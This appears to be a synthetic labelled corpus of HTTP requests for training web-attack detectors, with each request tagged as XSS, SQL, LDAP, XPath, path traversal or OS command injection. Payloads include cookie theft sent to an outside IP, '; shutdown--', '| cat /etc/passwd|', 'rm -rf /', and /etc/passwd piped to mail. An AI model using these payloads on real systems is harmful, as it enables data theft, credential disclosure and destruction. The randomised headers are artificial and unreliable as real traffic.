Client-ip: 223.239.75.68
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="3"
Date: Mon, 21 Aug 06 03:24:31 GMT
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: 100-continue
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Sat, 17 Apr 04 10:21:08 CET
If-Unmodified-Since: Mon, 11 Jan 10 24:37:18 CET
If-Match: *
If-None-Match: "NWHHkviw4hF3DHUm"
If-Range: *
Max-Forwards: 00
MIME-Version: 2.3
Pragma: 7dasnanj='odiat'
Proxy-Authorization: Digest username="xisr3"
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: /stala.sh
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: atraOjx/3.9.6.9.5
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: pde9/1.0 www.eimrtvg.css
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38110
Start - Id: 49460
class: XPathInjection
GET /ivuMij@/0.ocqCsystemVsrS/tsn/yurWaYfFntvi/ga/hftt2ixees/h0WHD.3/It/mhBgq2wI@C53f5BdEC.msf?g6soieantNlobs=0323286166&fetilurso=lfnbJnh5.NI3&a9hta=eck&execTrgLdivrmTcihttpsn=352&Bete6erfl=776&atatOr=2St&atstwtacMnueiy=turtr%27%5D+++++%7C+P++%7C++%2F%2Fuser%5B+++name%2Ftext%28++++%29++++%3D+%27nZss&lbsszVearrsvp0=73178185&efer=o%40espsrt%3C6%3Ep HTTP/1.0
Host: www.tdbh6u.gov:5
Connection: OnhvSaI
Accept: audio/x-wav
Accept-Charset: iso-8859-1, hz-gb-2312;q=0.1, iso-2022-jp;q=0.2, windows-874;q=0.5, x-mac-turkish
Accept-Encoding: compress
Accept-Language: sdhsv-w0ged;q=0.5, socnm-clt;q=0.2, rrcate-3n;q=0.6, cnsr-r;q=0.3, thnahdrd-sTkso;q=0.0
Cache-Control: no-store
Client-ip: 189.208.211.40
Cookie: rnefsarctnve=nOnMe;Bzupdaten=nac;hAdetwvel=e60HLsfgZ;T2dtiDerreN=oZ_J6GPpjVHc;tTe1e=y~t5;WbLcm0_1V7=mMmi
Cookie2: $Version="817"
Date: Sat, 21 Apr 07 21:35:40 GMT
ETag: W/"RvhtSSeefa@GeYDYZ."
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 25 Dec 08 18:25:57 CET
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nc=6E3c630e
Range: -012
Referer: /yeenl/7ert.js
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 4.1; 2l-se; rv:9.5.3) Gecko/02476400
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 16.113.150.28
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49460
Start - Id: 38739
class: LdapInjection
GET /jrmGN0shutdownr/s5OJ4GNMLQep/oI.v7xbV/rLS4ono7Ice8d/npeNOp7UsN5b7osriqa/oVwbK3rw.gif?sternpts=566%29%28%26%28objectClass%3Dsma%29%28%7C%28sn+++%3D++3tS7%29%28cn%3Dn7e+++++J*%29%29 HTTP/1.0
Host: www.sntte.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: 5eeraBoe-iad, ei1hTe-odi, ed-Oe1ue;q=0.1
Cache-Control: hnohir1='tr'
Client-ip: 62.92.248.134
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="510"
Date: Sat, 04 Nov 06 02:41:02 UTC
ETag: W/"wYpnHj9DHaQ5NK@n"
Expect: Eirzruo
From: Dddcd@u4uew8d4.be
If-Modified-Since: Wed, 17 Oct 07 04:58:58 GMT
If-Unmodified-Since: Mon, 07 Mar 05 23:26:28 CET
If-Match: *
If-None-Match: "KJ@.FoCGdiCsCQfMtxT"
If-Range: Sun, 14 Sep 08 02:47:53 GMT
Max-Forwards: 22
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Digest opaque="eJotl"
Range: 22791-
Referer: /eoAe/lsglnur/mitct.cfm
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/3.2 (Windows; U; Win98 5.7; ae-ds; rv:4.4.5) Gecko/73708311
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 708x0432
Via: FTP/9.8 www.cntw.js
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38739
Start - Id: 48230
class: XSS
POST /levb0r/7trp6o/n_s95/MAx-allscript03MInp0h3/a2R7TGkmt1yAI_chM1I/TP-cJfnW4.jpeg? HTTP/1.0
Content-Length: 199
Content-Language: joothta,emyttd
Content-Encoding: deflate
Content-Location: http://o1ataa.be/ileiui/tGOCnoa/edi9Fo/mhhlee7i/sAet7r.php4
Content-MD5: Um13b3M0YXNwdHFlSHNlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jan 10 04:01:12 CET
Last-Modified: Tue, 12 Oct 04 17:04:27 GMT
Host: 132.235.191.204:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.9, iso-8859-3, x-mac-hebrew, iso-8859-8-i;q=0.1, x-mac-roman
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 78.125.217.158
Cookie: sb=<img   src=  "    dein    > "  onmouseover    =    "    [window.open('http://87.241.179.193/etsiic.dll'+document.cookie);]"    >;G28shutdown=1
Cookie2: $Version="830"
Date: Mon, 03 Nov 08 18:10:09 UTC
ETag: W/"RvDuOejotXGbKWimI"
Expect: edjep=watar;Oneanh
From: rgCEe@mks1ccnon.com
If-Modified-Since: Tue, 18 Jul 06 17:27:51 GMT
If-Unmodified-Since: Fri, 25 May 07 05:05:06 GMT
If-Match: *
If-None-Match: "icVR6vxJFLBZI6U"
If-Range: "CCndbA6DakuVsH.i"
Max-Forwards: 3184
MIME-Version: 1.1
Pragma: e=ogjau9tE
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic ZXR1dml2ZzpydGR0
Range: 2-22075
Referer: /s9eogc/ayjtldd8/1sTHr/iaoWcy.aspx
TE: trailers,deflate;q=0.7
Trailer: TE
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 5.1; rh-dr; rv:1.0.7) Gecko/70418918
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 467x7799
Via: 9.5 59.44.235.74:86405
Transfer-Encoding: gzip
Warning: 462 www.iwxa.png "bnn9kisytiEeittsb" 
X-Serial-Number: 60545098
----: ---------------
~~~~~: ~~~~~~~~~~~

roeldoE=mdceiiwlnfo&IasahfdgUsn=27230&l2optehRp=9546&nt6db=ornqevalAImahtunionT&iadxoianasE9iw=tnsiottn&yrw1haseexLhio=don3goeaghtacces&9NLfwNLDUjgV=8e3ir0c&waU=e&eiieoeyuhsls4=ewosseasa1sp&xiEtvto=m

End - Id: 48230
Start - Id: 42146
class: SqlInjection
GET /di1EeLSsusuoca0sn.jsp?GUL_-.rc=1&nn1Tfgne0ah=1&vng=gLtnttt6tm6byi&6ruseeetin=6&Hhyxtswnc=ent%7Elink&ttustdsnhtebye=sh4&aspoNc=cekHHHk&eda4smiha9T=%27%3B+++++shutdown-- HTTP/1.1
Host: www.q78j6c6ee.it
Connection: keep-alive
Accept: image/gif;q=0.4, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: my-aHaa5e
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="903"
Date: Mon, 22 Oct 07 22:58:48 UTC
ETag: "Y-kpqEtfEwcQg2fs"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Thu, 16 Jun 05 06:24:24 UTC
If-Unmodified-Since: Thu, 01 Apr 10 23:17:11 GMT
If-Match: *
If-None-Match: "8NqXtTm@LnpvLXRAm"
If-Range: "8aGjbRfovFp.lSygXe"
Max-Forwards: 0
MIME-Version: 0.7
Pragma: ki=hAeop
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /tetapo/xert/hbyqtmh/1eemsad.jsp
TE: deflate,trailers
Trailer: Authorization
User-Agent: biesXiIp (kWs8aOvB; nkM@emvi73)
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 063x2185
Via: 6.9 178.93.157.42, FTP/4.6 254.106.202.20
Transfer-Encoding: compress
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42146
Start - Id: 41331
class: SqlInjection
GET /E4lxW8LEMhtpassl/taao5NrOi3hsstmtAqf/etn2do5iSnT/daeeteNdMoa/peuii4ewl0f4deh82/8PACOS@QvcOo/u4txteelpwa.png?psin=38&emdntw2sasstl=sno%2BMxp_s8t1L%28eEa&fddryhmpiue8o=ePCoyp-nj6o3&Ld-9fMSyE=c6oeddiasoi9Fmne&egs8fygStws=dZk6OHDV&ii1n20=59894&kexdrcetrossya=1456 HTTP/1.1
Host: 77.6.69.134:80
Connection: smToe
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 88.209.68.71
Cookie: eo=1214;nbbpe6=' /**/    OR /**/  'hdbajroma'    > 'S
Cookie2: $Version="87"
Date: Tue, 16 Aug 05 16:43:47 GMT
ETag: "fflb3AGZexOf_n2Pn"
Expect: cehh3lIo=rotitev
If-Modified-Since: Sat, 22 Jul 06 23:19:54 CET
If-Unmodified-Since: Fri, 02 Oct 09 20:02:47 GMT
If-Match: "D@MG454sDcomnil-RK"
If-None-Match: "HtqvQOwxX7mXU8PTiMT5"
If-Range: Sat, 01 May 10 04:10:36 GMT
Max-Forwards: 3425
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM aU5ldXV0ZWRhdHNyb2EwZWVFaGFzaXNvaXJoOHpzZWRlZGhZ
Authorization: Digest username="4gooeiit"
Referer: http://dr7gtt.biz/clrlhdoo/peatst/tse7w/rgob/t8myEI.doc
TE: chunked;q=0.7,deflate,gzip;q=0.7
User-Agent: Mozilla/5.5 (Windows; U; Win98 9.5; da-hs; rv:6.8.6) Gecko/77065162
UA-Disp: 9805,864,16
Via: HTTP/6.5 207.15.58.167:9, HTTP/0.2 7.246.102.202, 4.2 247.7.160.220
Transfer-Encoding: rytmn; aqoxh=5mij
Warning: 215 46.152.44.99 "oacehtlesn9oysnhv" "Mon, 22 Oct 07 12:23:25 GMT"
X-Forwarded-For: 138.41.36.100
X-Serial-Number: 0106463
----: -------------------

null

End - Id: 41331
Start - Id: 45435
class: PathTransversal
PUT /eolSpErrEohal/hjGdtalosmayii.shtml? HTTP/1.0
Content-Length: 67
Content-Language: uxr,szti7Ass
Content-Encoding: identity
Content-Location: /aesedr.php3
Content-MD5: ZXFtZXoyb2lsZXhlT2FkdA==
Content-Type: application/x-www-form-urlencoded
Host: 232.97.71.36
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: jt-bmuce, rtl-atje, hrc-md4ttt, tyceLu-7ne1rdD, o58aaSc-8;q=0.5
Cache-Control: no-cache
Cookie: sai=Ka5iO6cGe;ty8xNapWn1Ecs=oa;mL8N=0102;sluf=cuyi ;aNiBeyk8a=ntolles0eg;mcqmae4=zepLythus
Cookie2: $Version="71"
Date: Thu, 20 Aug 09 17:20:32 CET
ETag: "cWVaQKspJRouILSecHXU"
Expect: 100-continue
If-Unmodified-Since: Tue, 25 Dec 07 20:02:26 UTC
If-None-Match: *
Max-Forwards: 4382
Referer: http://adrmNcEi.cz/toth/ndEn.msf
Trailer: Pragma
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 4.8; na-ym; rv:3.6.3) Gecko/39784102
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dht=..\..\..\..\WINDOWS\system.ini&Yot9Znauee=ewJmcXlOBUy

End - Id: 45435
Start - Id: 36903
class: LdapInjection
POST /m77bexta0rtn/iCseOtarE/yhhbIxJqczwo.Y-HWUGH/oAT0lWQh.jpeg? HTTP/1.1
Content-Length: 191
Content-Language: aX
Content-Encoding: deflate
Content-Location: /ntwo/eonlritr/ae3ini/haoeh5x.asp
Content-MD5: b2huMzgzaHZzbmJuaDlzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Aug 08 05:03:37 CET
Last-Modified: Wed, 22 Sep 04 05:10:12 GMT
Host: www.47miv.net
Connection: ee8sh
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: sur-dt;q=0.0, nw9-Ae7laeon, ct9uIv-e, ies-d, etiau5a-yr;q=0.9
Cache-Control: cserch=oahgs
Client-ip: 16.173.236.24
Cookie: drsiaocnhn=connect;nEtalNe=tBopte>a;W@5phpupr=1;l9stdinPbaG0=2iEhc4
Date: Mon, 14 May 07 21:50:28 UTC
Expect: otthrv
If-Modified-Since: Tue, 13 May 08 09:27:42 UTC
If-Match: *
If-Range: Thu, 08 Nov 07 06:30:18 UTC
Max-Forwards: 31
MIME-Version: 8.2
Pragma: asM=tooe
Proxy-Authorization: Basic dTJlaTplcjNyY0hv
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Range: 03-
Referer: http://www.lad1eb9p.ch/sdEtund/LALr4per.tiff
Trailer: Warning
User-Agent: Mozilla/4.1 (compatible; Konqueror/4.9; Windows NT; lleckeoel; matDesd)
UA-OS: Win98
Via: HTTP/6.4 146.137.227.84, 3.4 www.iiEe7re.shtml, 5.2 www.wme1w.htm:75706
Transfer-Encoding: identity
Warning: 128 59.175.65.205 "atelalsoarn" 

as6zeaeesevdoTi=mshutdown<e&Renin=aaecpwhh43&ehseoe4se= si edphscriptnc5&@Nto&fday=32)(&(objectClass=ermh)(|(sn    =    eege)(cn=amB  J*))&wwuhhSacstrt=830

End - Id: 36903
Start - Id: 36774
class: OsCommanding
GET /epvDFJ03o/do2mhsnhsnhcl/mSsl2M/wrLfAZr-8IRtQ@@/m6Bino/vs1WTDm/nFvYtzCgTf9E4r/oee4lRrht9tfesR9oij/sf5-TZ5LwTTfTdX0MpPJ/tTp6Fw.html?dwdwotsJc5ad=%7C+cat+%2Fetc%2Fpasswd%7C HTTP/1.1
Host: 138.83.100.140
Connection: witr1t
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: reep-3h
Cache-Control: no-transform
Client-ip: 41.112.35.248
Cookie: Isx=e(
Cookie2: $Version="4"
Date: Thu, 15 Feb 07 02:51:48 GMT
ETag: "cVJDZYCIgSRT74iSj-"
Expect: 100-continue
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sat, 19 May 07 02:15:52 GMT
If-Unmodified-Since: Wed, 29 Sep 04 18:08:16 CET
If-Match: "ImJfcXMM2cph9T_d"
If-None-Match: "YzaWyouLc60m-OQx"
If-Range: "QU.j350IZO40kg8V"
Max-Forwards: 50
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: Digest uri=http://www.awdnOe.be/cei4stoC/q2n0bxap/eteeu/atsndu0/lay5.htm
Range: -0
Referer: http://www.icdz.de/e2ae/n4dtRe9/entnb3o/vldmii4m.php
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.2 (X11; U; Unix 3.4; yr-ep; rv:3.4.3) Gecko/66416825
UA-CPU: PowerPC
UA-Disp: 944,674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 232x1783
Via: 0.8 191.50.111.146
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36774
Start - Id: 43310
class: OsCommanding
GET /annrlcRr7baclnrqye/JZgUJP/tta/aowOtLJzgjin0C.sh?Yhoi5=dneEwite2&kLK54jJ9Sx=1400945&auc1dn=iaaleTnIi&k5hejdTsrstae=eupSui&ijmzdZaz6uoiis=%5B%3B0a1%28biiteMuenl&SnodexfL66z07=%60+++++rm+++++-rf++%2F+++%60 HTTP/1.1
Host: www.vhnsn.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 39.60.249.69
Cookie: rhirln01ermtu=tBz2U9g@4
Cookie2: $Version="72"
Date: Thu, 23 Apr 09 17:17:20 UTC
ETag: "8tYmBLFfcCT-OoAu"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Wed, 13 Apr 05 08:55:08 GMT
If-Unmodified-Since: Thu, 12 Jun 08 09:10:20 GMT
If-Match: "_Zgo5vd.6Mmc0oyyqU"
If-None-Match: "Cnw2pKc5XwP8oYoYTx"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 567
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic bG5zcDp0b2lia3Nhbw==
Authorization: Basic Ump1QW10RTprZnl6bnc=
Range: 398265-
Referer: /yrh3te/rteisie/t8eRWd/eenfEj6/guttno.jpg
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: nunvsic/4.0.2.6
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: deflate
Upgrade: etcpl/3.4, Mhnlo/4.7, tml/8.3, ee6e2/3.3, sznIfp/8.1
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 221.241.126.53
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43310
Start - Id: 47612
class: XSS
GET /hYdeonyVoLhesze/ated5d3inrW/sm5-CIQOLOy8Pv4bs_z/bfVUy_VV0/zinOGpasswdjtAAIc.r/6zWOfppQAaksija2U0/mL2Yl.asmx?teclnrinpt=52856926&oe9lrail7=sKb7A&dtETpnyiatoowa=89&ae=%5Ba%2BcSe%28Nhts&l4erd2T=rm8s++xsltstIodichildhttpzru&es=uuIzUGsMFE&cr04g8KL55=82&etTptponq8=mremh2oncalr&oPRF-8HQD3=%3Cimg+++++src++++%3D%22+++anal+++%22onmouseover%3D+++%22++++%5Balert++%28%27aD%27%29%3B%5D+%22+++%3E&gcofbAsosesx=%5BecganrhOato%3F&om5ao6no=telneta+sf%3Asen5ni4hio&joS=oi HTTP/1.1
Host: www.nsDtee.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: isiri-3342, euc-kr
Accept-Encoding: *;q=0.0
Accept-Language: isibl-neis;q=0.2
Cache-Control: max-age=990
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="47"
Date: Wed, 01 Nov 06 03:33:25 UTC
ETag: "@Xjp1ovKWikgKE4aj"
Expect: 100-continue
From: urg9ebr@loeuenugsj.fr
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "AlnZlixlOIErmXKEI"
If-None-Match: *
If-Range: Mon, 03 Jul 06 05:25:50 GMT
Max-Forwards: 602
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 393273-
Referer: /n1rlds/shcn.tiff
TE: gzip;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 0.5; rI-ls; rv:8.6.4) Gecko/86288840
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: 5.5 134.39.107.235, 0.0 www.t4en.js:145
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47612
Start - Id: 47389
class: XSS
GET /nuoshSty/oa3ei7/HTdropZXGxT.UE7/0dV@gb2Go/liteogyab/lq9KwfUYRPOY/aimtenrir/yek8@ZoXwK4/Y1autoexecV1-7vOA.msf?dnunkim7=%3Cdiv++style%3D+++%22+++++background-image%3A+url%28javascript%3A++++%5Balert+%28%27t9t%27%29%3B%5D%29%3B++++%22%3E&ocohEtehyd=sut&eouy0esgs=e7nfbt&dhd=+a&mYepPD2Z=access_loglA%5Cekrerles%7Ea&mjLdnshcs8=z6RO_1&hee0nrmaEnhoi=e9o4DlbNJU8&ah2atD0aovh=5&ted7=nw&iiahTbu=952217&Wahd02rgexesav=maeh7eqlhn84imn&eSnshicaseUsn=rnTn%40I HTTP/1.0
Host: 196.213.20.179
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 193.205.45.58
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="2"
Date: Wed, 22 Jun 05 16:34:21 UTC
ETag: "1_PrZhgCDExZr_."
Expect: 100-continue
From: ra6tapm@ejbc5awp.com
If-Modified-Since: Tue, 11 Jan 05 05:25:11 CET
If-Unmodified-Since: Sat, 01 Oct 05 06:31:01 UTC
If-Match: "nmzOLIVMdJHDZZZFtdHP"
If-None-Match: *
If-Range: Tue, 06 Nov 07 02:49:58 CET
Max-Forwards: 521
MIME-Version: 1.0
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: http://li2etra.uk/hdu0ossf/ossaO4/shftll.nsf
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: sANMXxkW http://www.zoer.de
UA-CPU: MIPS
UA-Disp: 7745,5252,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 3.5 www.fnkhvIa.png
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47389
Start - Id: 44164
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 104.197.47.235
Connection: 9wurA
Accept: video/*, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: thla-emecl0ie;q=0.7, feagIp-8ims, r35it-iiodn2u4, H1Sh-9eroi1wt;q=0.3, ieeYtIl3-Hbyda3gy;q=0.3
Cache-Control: no-cache
Client-ip: 21.12.224.178
Cookie: dafn40oacsNpggH=tetcexecayttf]dwautoexecoc %e;R3cd1HoLepe=tNtShn;A9necwknetrn=mvar
Cookie2: $Version="13"
Date: Sun, 21 Mar 10 14:15:26 UTC
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:22:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 3.5
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic VXZ3OGVlc2w6Z2I4Yg==
Range: -84280,-90,309098-0
Referer: /ao7tcjnn.swf
TE: trailers
Trailer: Cache-Control
User-Agent: R8cAceffst/2.1.9
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 9.4 45.12.135.237:5348
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 46.6.55.36
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44164
Start - Id: 36710
class: OsCommanding
PUT /sL/sbk7yCaNQE/ADZbFGdZlshprocessing-instructionlocationJE/jc/aDy2/ccceridsor/aqV8b7SxRGH@tr5/sZTz_M1bpv8iJuJ/ssg9nnht/cBkBHwuJ7kdVlhmuBAP.pl? HTTP/1.0
Content-Length: 121
Content-Language: eeesx5o6
Content-Encoding: identity
Content-Location: /qTpi.mspx
Content-MD5: Z2VuQWhlbWl4VGhyZTBucg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 02:24:07 UTC
Last-Modified: Wed, 17 Mar 04 02:09:59 UTC
Host: 4.107.235.3
Connection: rirr
Accept: audio/basic;q=0.4, application/*;q=0.8
Accept-Charset: isiri-3342, windows-1251
Accept-Encoding: 
Accept-Language: N-fje
Cache-Control: min-fresh=95634
Client-ip: 227.141.185.118
Cookie: Zlnetcatiz2.-UF=7031915994;ttteyoeu=07
Cookie2: $Version="7"
Date: Mon, 02 Jun 08 08:48:42 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: ihu8
From: eralt@eApeeioers.de
If-Modified-Since: Wed, 22 Mar 06 15:48:47 UTC
If-Unmodified-Since: Tue, 15 Feb 05 21:05:21 UTC
If-Match: "mZ7_d6oxrSW_EpejB"
If-None-Match: "o1-oPsiDLjbd4.dJ5jbk"
If-Range: "3b.M4viHeetmB2NFuEpe"
Max-Forwards: 6
MIME-Version: 4.5
Pragma: i3=lw1n
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 11-,-3
Referer: http://www.6any6cs.cz/sOe9ee/nhle/inaScpg/4ctss.php
TE: gzip,deflate,chunked
Trailer: Pragma
User-Agent: faOseWu/2.6.5
UA-CPU: 68000
UA-Disp: 1584,454,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x545
Via: 2.8 www.yar0.shtml
Transfer-Encoding: deflate
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 3.19.153.226
X-Serial-Number: 56753790065108318
----: ---------------------------------

ff6ertlcoi=nX2RIHb0UH7&aycerj=aehr9szgsnwptlm&dihAnr6iTanpn=oops;  cat     /etc/passwd  |   mail    your@9f.com

End - Id: 36710
Start - Id: 49226
class: XPathInjection
